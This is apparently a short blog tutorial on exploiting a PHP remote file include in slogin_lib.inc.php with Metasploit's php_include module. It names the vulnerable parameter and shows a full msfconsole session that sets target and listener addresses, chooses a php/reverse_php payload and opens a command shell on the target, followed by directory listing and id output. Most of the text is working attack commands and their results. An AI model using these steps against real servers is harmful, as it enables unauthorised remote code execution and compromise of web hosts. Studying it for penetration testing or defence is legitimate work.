Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

and make your PHPURI

PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX

let's see it in action

msf > search php_include [*] Searching loaded modules for pattern 'php_include'... Exploits ======== Name Rank Description ---- ---- ----------- unix/webapp/php_include excellent PHP Remote File Include Generic Exploit msf > use exploit/unix/webapp/php_include msf exploit(php_include) > info Name: PHP Remote File Include Generic Exploit Version: 8762 Platform: PHP Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: hdm egypt Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes The base directory to prepend to the URL to try PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL PHPURI no The URI to request, with the include parameter changed to XXpathXX Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload information: Space: 32768 Description: This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX msf exploit(php_include) > set PATH /1/ PATH => /1/ msf exploit(php_include) > set RHOST 192.168.6.68 RHOST => 192.168.6.68 msf exploit(php_include) > set RPORT 8899 RPORT => 8899 msf exploit(php_include) > set PAYLOAD php/reverse_php PAYLOAD => php/reverse_php msf exploit(php_include) > set LHOST 192.168.6.140 LHOST => 192.168.6.140 msf exploit(php_include) > exploit [*] Started bind handler [*] Using URL: http://192.168.6.140:8080/RvSIqhdft [*] PHP include server started. [*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30 %38%30%2f%52%76%53%49%71%68%64%66%74%3f [*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010 dir 0.jpeg  header.inc.php license.txt slog_users.txt  version.txt 1.jpeg  index.asp old  slogin.inc.php adminlog.php install.txt readme.txt slogin_genpass.php footer.inc.php launch.asp slog_users.php slogin_lib.inc.php id uid=33(www-data) gid=33(www-data) groups=33(www-data)